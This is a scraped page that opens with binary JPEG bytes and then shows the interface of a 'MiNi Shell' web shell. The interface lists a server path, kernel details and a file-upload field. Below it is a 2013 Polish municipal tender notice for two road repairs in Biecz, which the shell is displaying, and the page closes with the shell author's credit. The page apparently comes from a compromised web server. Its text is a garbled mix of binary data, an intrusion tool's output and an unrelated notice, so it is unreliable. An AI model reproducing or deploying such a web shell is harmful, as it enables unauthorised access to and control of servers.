JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130719/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130719/284484-N-2013.html

<p class="kh_header"><b>Biecz: Realizacja niżej wymienionych zadań w ramach podziału środków na usuwanie klęsk żywiołowych, dofinansowanych w 2013 roku:
1.  Remont drogi gminnej k/Karpia do drogi powiatowej nr dz. ewid. 66 w m. Korczyna                w km  0+000 - 0+300,
2. Remont drogi gminnej K/Piotrowskiej nr dz. ewid. 1294 w m. Sitnica                                            w km 0+000 - 0+400.</b><br>
<b>Numer ogłoszenia: 284484 - 2013; data zamieszczenia: 19.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biecz , Rynek 1, 38-340 Biecz, woj. małopolskie, tel. 013 4471113, faks 013 4471113.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biecz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja niżej wymienionych zadań w ramach podziału środków na usuwanie klęsk żywiołowych, dofinansowanych w 2013 roku:
1.  Remont drogi gminnej k/Karpia do drogi powiatowej nr dz. ewid. 66 w m. Korczyna                w km  0+000 - 0+300,
2. Remont drogi gminnej K/Piotrowskiej nr dz. ewid. 1294 w m. Sitnica                                            w km 0+000 - 0+400..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest realizacja niżej wymienionych zadań w ramach podziału środków na usuwanie skutków klęsk żywiołowych, dofinansowanych w  2013 roku:

     1)	Remont drogi gminnej k/Karpia do drogi powiatowej nr dz. ewid. 66 w m. Korczyna                          w km  0+000 - 0+300,

       Zakres obejmuje: remont drogi gminnej k/Karpia do drogi powiatowej w m. Korczyna w km 0+000 - 0+300, polegający na wykonaniu nawierzchni bitumicznej z masy mineralno-asfaltowej. Zaplanowano wykonanie nawierzchni o szerokości 3,0m warstwy ścieralnej o gr. 4 cm i warstwy wiążącej                o gr. 5 cm. Nawierzchnia utwardzona zostanie położona na dwóch warstwach podbudowy wykonanej w miejscu zniszczonej nawierzchni żwirowej wraz z wykonaniem koryta na głębokość 30 cm. Wykonanie podbudowy składa się z dwóch warstw:
       -	warstwy dolnej z kruszywa naturalnego o gr. 20 cm 
       -	warstwy z kruszywa łamanego o gr. 10 cm.
       Uzupełnienie poboczy zaplanowano kruszywem łamanym stabilizowanym mechanicznie o gr. 12 cm obustronnie wzdłuż remontowanego odcinka drogi o pochyleniu około 8% w stronę rowów odwadniających.

     2)	Remont drogi gminnej K/Piotrowskiej nr dz. ewid. 1294 w m. Sitnica w km 0+000 - 0+400.

	Zakres obejmuje: remont drogi gminnej k/Piotrowskiej w m. Sitnica w km 0+000 - 0+400 polegający na wykonaniu nawierzchni bitumicznej z masy mineralno-asfaltowej. Zaplanowano wykonanie nawierzchni o szerokości 2,8m warstwy ścieralnej o gr. 5 cm i warstwy wiążącej                          o gr. 5 cm. Nawierzchnia utwardzona zostanie położona na dwóch warstwach podbudowy wykonanej w miejscu zniszczonej nawierzchni żwirowej wraz z wykonaniem koryta na głębokość 30 cm. Wykonanie podbudowy składa się z dwóch warstw:
       -	warstwy dolnej z kruszywa naturalnego o gr. 20 cm 
       -	warstwy z kruszywa łamanego o gr. 10 cm.
       Uzupełnienie poboczy zaplanowano kruszywem łamanym stabilizowanym mechanicznie o gr. 12 cm obustronnie wzdłuż remontowanego odcinka drogi o pochyleniu około 8% w stronę rowów odwadniających.



2. Szczegółowy opis przedmiotu zamówienia zawarty jest w:
   1) Dokumentacji Technicznej Remontu dogi gminnej k/Karpia do drogi powiatowej nr dz. ewid. 66             w m. Korczyna  w km  0+000 - 0+300 - stanowiącej załącznik nr 1 do SIWZ.
   2) Dokumentacji Technicznej Remontu dogi gminnej  K/Piotrowskiej nr dz. ewid. 1294 w m. Sitnica             w km 0+000 - 0+400 - stanowiącej załącznik nr 2 do SIWZ.
   3) Specyfikacji Technicznej  Wykonania i Odbioru Robót Budowlanych - stanowiącej załącznik             nr 3 do SIWZ.
   4)  Przedmiarach robót - stanowiących  załącznik nr 4 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda składana oferta musi być zabezpieczona wadium w wysokości:  4 000,00 zł - słownie: cztery tysięcy złotych.
Wadium może być wnoszone w następujących formach:
-	pieniądzu (wyłącznie przelewem na rachunek bankowy zamawiającego),
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym     że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia                          9 listopada  2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

2. Wadium wnoszone w formie pieniądza należy wpłacić na konto zmawiającego: Gmina Biecz ul. Rynek 1 38-340 Biecz, BS Biecz  Nr 16 8627 0001 2002 3000 0954 0002.
3. Wadium wnoszone w innej formie niż w pieniądzu należy przekazać zamawiającemu w osobnej kopercie - pok. nr 2 - kasa zamawiającego.
4. Termin wniesienia wadium w każdej formie:  do dnia 06.08.2013 r. do godz. 1000.
5. W przypadku wniesienia wadium w formie pieniądza za termin wniesienia wadium przyjmuje się datę uznania  na rachunku zamawiającego !
6. Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 ustawy Prawo zamówień publicznych. 
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, 
o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje wymagań w zakresie ww. warunku.
Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia Wykonawcy - załącznik nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku zamawiający uzna wykonanie z należytą starannością w okresie pięciu ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed upływem terminu składania ofert, co najmniej dwóch zamówień, odpowiadających robotom budowlanym stanowiącym przedmiot niniejszego zamówienia, przez co Zamawiający rozumie wykonanie robót budowlanych polegających na budowie lub remoncie drogi lub dróg o nawierzchni asfaltowej, z czego każde                         z wykonanych zamówień  o wartości  nie mniejszej niż  150.000,00 zł (brutto), z podaniem ich rodzaju               i wartości, daty i miejsca wykonania - według wzoru stanowiącego załącznik nr 7 do SIWZ, a także załączeniem poświadczeń wystawionych przez podmioty na rzecz których wykonano zamówienie lub innych dokumentów jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 

Zamawiający informuje, że Wykonawca, w miejsce poświadczeń o których wyżej mowa, może przedkładać dokumenty potwierdzające należyte wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej                     i ich prawidłowe ukończenie, określone w § 1 ust. 1 pkt 2 i 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).

W przypadku, gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie zostały wcześniej  wykonane, wykonawca nie ma obowiązku przedkładania dowodów.
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły : spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje wymagań w zakresie ww. warunku.
Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia Wykonawcy - załącznik nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku zamawiający uzna dysponowanie potencjałem kadrowym niezbędnym do realizacji zamówienia tj. co najmniej jedną osobą - kierownikiem budowy, posiadającym uprawnienia budowlane w specjalności drogowej lub odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów - zgodnie z polskim Prawem Budowlanym.
Zamawiający uzna, za spełniony powyższy warunek, jeżeli wykonawca w zakresie dysponowania osobami przedstawi wykaz  osób, które będą uczestniczyć w wykonywaniu zamówienia (zgodnie z zał. nr 8 do SIWZ) oraz złoży oświadczenie o posiadaniu uprawnień przez te osoby (zgodnie z zał. nr  9 do SIWZ).
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły : spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje wymagań w zakresie ww. warunku.
Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia Wykonawcy - załącznik nr 6 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Oferta na formularzu ofertowym o treści zgodnej z określoną we wzorze stanowiącym zał. nr 5 do SIWZ. Formularz musi być podpisany przez osobę/osoby uprawnione do składania oświadczeń woli w zakresie praw i obowiązków majątkowych wykonawcy z podaniem ceny za całość przedmiotu zamówienia.
2) Dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający informuje, że postanowienia umowy mogą zostać zmienione w następującym zakresie:

1) Termin realizacji zamówienia może ulec zmianie ze względu na: 

- konieczność wykonania innych robót budowlanych lub montażowych niż objęte niniejszym zamówieniem, których konieczność nie była znana wcześniej,  a ich wykonanie stało się niezbędne dla prawidłowej realizacji zadania,
- wyjątkowo niesprzyjające warunki atmosferyczne uniemożliwiające wykonanie robót zgodnie z zasadami współczesnej wiedzy technicznej i obowiązującymi przepisami,
- wystąpienie siły wyższej,
- niezawinionego przez wykonawcę ograniczenia dostępności placu budowy w czasie realizacji robót,
- wstrzymania przez Zamawiającego wykonania robót nie wynikających z okoliczności leżących po stronie Wykonawcy. (Nie dotyczy okoliczności wstrzymania robót przez inspektora nadzoru zamawiającego w przypadku stwierdzenia nieprawidłowości zawinionych przez wykonawcę) -  termin ten może ulec przedłużeniu nie dłużej jednak niż o czas trwania tych okoliczności.

Pozostałe dopuszczalne zmiany umowy:
- zmiany zabezpieczenia umowy. Zmiana przewidziana w art. 149 ust. 1 ustawy Prawo zamówień publicznych, 
- zmiany w zakresie rozszerzenia odpowiedzialności z tytułu rękojmi poprzez wydłużenie terminu rękojmi oraz przedłużenie terminu udzielonej gwarancji w przypadku zaproponowania takiego rozwiązania przez Wykonawcę,
- zmiany w zakresie zmiany podwykonawców w przypadku: rezygnacji podwykonawcy, 	zmiany wartości lub zakresu robót wykonywanych przez podwykonawców.
          -      zmiany kluczowego personelu Zamawiającego i Wykonawcy z powodu:
śmierci, choroby, rezygnacji, zwolnienia pracownika lub innych zdarzeń losowych  dotyczących  kierownika budowy lub inspektora nadzoru,
zastrzeżeń jednej ze stron, co do kompetencji kierownika budowy lub inspektora nadzoru.
- zmiany kierownika budowy - nowy kierownik budowy musi spełniać wymagania określone w SIWZ dla kierownika budowy.

Powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Powyższe postanowienia nie stanowią zobowiązania zamawiającego do wyrażenia zgody na ich wprowadzenie.

Warunki zmian:
   -   inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
   -   uzasadnienie zmian- prawidłowa realizacja przedmiotu umowy, zapewnienie optymalnych  parametrów technicznych i jakościowych robót,
   -   forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.biecz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieczu
38-340 Biecz ul. Rynek 20, pok. nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2013 godzina 10:00, miejsce: Urząd Miejski w Bieczu
38-340 Biecz ul. Rynek 1, pok. nr 2 - kancelaria urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Przed wszczęciem postępowania o udzielenie zamówienia nie przeprowadzono dialogu  technicznego.
2. Nie przewiduje  się udzielania  zamówień uzupełniających.	
3. Nie przewiduje się udzielenie zaliczek na poczet wykonania zamówienia.
4. Nie ogranicza się możliwości ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50% pracowników stanowią osoby niepełnosprawne
5. Nie przeprowadzona będzie aukcja elektroniczna.
6. Informacja o zamiarze zawarcia umowy ramowej - nie dotyczy.
7. Informacja o zamiarze ustanowienia dynamicznego systemu zakupów  - nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com